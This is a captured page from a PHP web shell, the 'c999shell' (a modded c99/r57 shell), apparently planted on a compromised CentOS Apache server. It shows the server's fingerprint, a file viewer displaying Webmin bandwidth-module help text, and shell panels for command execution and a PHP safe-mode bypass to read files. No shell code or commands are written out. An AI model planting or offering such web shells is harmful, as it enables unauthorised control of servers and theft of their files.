Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/libexec/webmin/bandwidth/help/ drwxr-xr-x |
Viewing file: intro.html (2.58 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | Before it can be used, the module must setup several firewall rules and a syslog entry to capture traffic sent and received via your system. At setup time you must select the system's external network interface, on which traffic will be monitored. This will typically be the PPP interface used for your dialup or ADSL connection, or the Ethernet interface connected to your cable modem or upstream router. Once at least an hour's worth of traffic has been captured, the module can by used to generate reports summarizing the traffic by one of the following categories :
The report can also be limited to traffic collected between selected hours, using the For traffic after and For traffic before fields. Because traffic is summarized by hour, you cannot limit the report with any greater precision than hourly. The option Server ports only? is useful when reporting by incoming, outgoing or all ports. It restricts the display to ports commonly used by servers (those below 1024 or with names), to avoid cluttering the display with counts for client-side ports that are not commonly useful. The option Resolve hostnames? can be selected when reporting by host. It will cause all IP addresses to be reverse-resolved to hostnames, where possible.
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0109 ]-- |